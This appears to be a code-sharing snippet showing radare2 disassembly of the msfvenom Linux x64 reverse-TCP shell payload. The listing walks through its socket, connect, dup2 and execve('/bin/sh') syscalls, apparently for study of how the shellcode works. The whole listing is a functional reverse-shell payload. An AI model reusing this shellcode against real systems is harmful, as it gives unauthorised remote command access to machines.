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Last active February 25, 2019 23:16
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radare2 pd output for msfvenom: linux/x64/shell_reverse_tcp
0x00 6a29 push 0x29 ; ')' ; 41
0x02 58 pop rax
0x03 99 cdq
0x04 6a02 push 2 ; 2
0x06 5f pop rdi
0x07 6a01 push 1 ; 1
0x09 5e pop rsi
0x0a 0f05 syscall
0x0c 4897 xchg rax, rdi
0x0e 48b90200115c. movabs rcx, 0x100007f5c110002
0x18 51 push rcx
0x19 4889e6 mov rsi, rsp
0x1c 6a10 push 0x10 ; 16
0x1e 5a pop rdx
0x1f 6a2a push 0x2a ; '*' ; 42
0x21 58 pop rax
0x22 0f05 syscall
0x24 6a03 push 3 ; 3
0x26 5e pop rsi
┌─> 0x27 48ffce dec rsi
╎ 0x2a 6a21 push 0x21 ; '!' ; 33
╎ 0x2c 58 pop rax
╎ 0x2d 0f05 syscall
└─< 0x2f 75f6 jne 0x27
0x31 6a3b push 0x3b ; ';' ; 59
0x33 58 pop rax
0x34 99 cdq
0x35 48bb2f62696e. movabs rbx, 0x68732f6e69622f ; '/bin/sh'
0x3f 53 push rbx
0x40 4889e7 mov rdi, rsp
0x43 52 push rdx
0x44 57 push rdi
0x45 4889e6 mov rsi, rsp
0x48 0f05 syscall
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